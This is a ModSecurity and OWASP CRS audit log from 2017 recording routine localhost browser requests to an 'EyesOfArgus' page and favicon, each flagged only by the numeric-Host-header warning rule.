{"transaction":{"time":"13/May/2017:12:49:03 --0400","transaction_id":"WRc4-38AAQEAABwRiHsAAAAE","remote_address":"127.0.0.1","remote_port":42706,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4-38AAQEAABwRiHsAAAAE\"]"],"stopwatch":{"p1":641,"p2":1445,"p3":333,"p4":433,"p5":52,"sr":33,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:43 --0400","transaction_id":"WRc5J38AAQEAABzhe1QAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc5J38AAQEAABzhe1QAAAAF\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":648,"p2":1100,"p3":69,"p4":401,"p5":120,"sr":41,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:43 --0400","transaction_id":"WRc5J38AAQEAABzhe1UAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:39 GMT","ETag":"\"cca-54f6a9b9e1299-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc5J38AAQEAABzhe1UAAAAF\"]"],"stopwatch":{"p1":380,"p2":1066,"p3":62,"p4":369,"p5":58,"sr":18,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1YAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:49:41 GMT","ETag":"\"295-54f6a9bb5c11f\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc5KH8AAQEAABzhe1YAAAAF\"]"],"stopwatch":{"p1":603,"p2":1594,"p3":83,"p4":211,"p5":91,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1cAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc5KH8AAQEAABzhe1cAAAAF\"]"],"stopwatch":{"p1":506,"p2":1134,"p3":55,"p4":246,"p5":53,"sr":23,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:49:44 --0400","transaction_id":"WRc5KH8AAQEAABzhe1gAAAAF","remote_address":"127.0.0.1","remote_port":42720,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc5KH8AAQEAABzhe1gAAAAF\"]"],"stopwatch":{"p1":428,"p2":922,"p3":46,"p4":247,"p5":49,"sr":19,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoAAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:56:05 GMT","ETag":"\"ccc-54f6ab29ace5f-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc69X8AAQEAABwOGoAAAAAB\"]"],"stopwatch":{"p1":15638,"p2":3134,"p3":87,"p4":468,"p5":71,"sr":82,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoEAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc69X8AAQEAABwOGoEAAAAB\"]"],"stopwatch":{"p1":416,"p2":874,"p3":47,"p4":248,"p5":49,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:25 --0400","transaction_id":"WRc69X8AAQEAABwOGoIAAAAB","remote_address":"127.0.0.1","remote_port":43506,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc69X8AAQEAABwOGoIAAAAB\"]"],"stopwatch":{"p1":360,"p2":1789,"p3":69,"p4":450,"p5":49,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:57:49 --0400","transaction_id":"WRc7DX8AAQEAABwQSCIAAAAD","remote_address":"127.0.0.1","remote_port":43520,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive","Upgrade-Insecure-Requests":"1","If-Modified-Since":"Sat, 13 May 2017 16:56:05 GMT","If-None-Match":"\"ccc-54f6ab29ace5f-gzip\""}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:57:46 GMT","ETag":"\"ccc-54f6ab8a0710a-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1211","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file 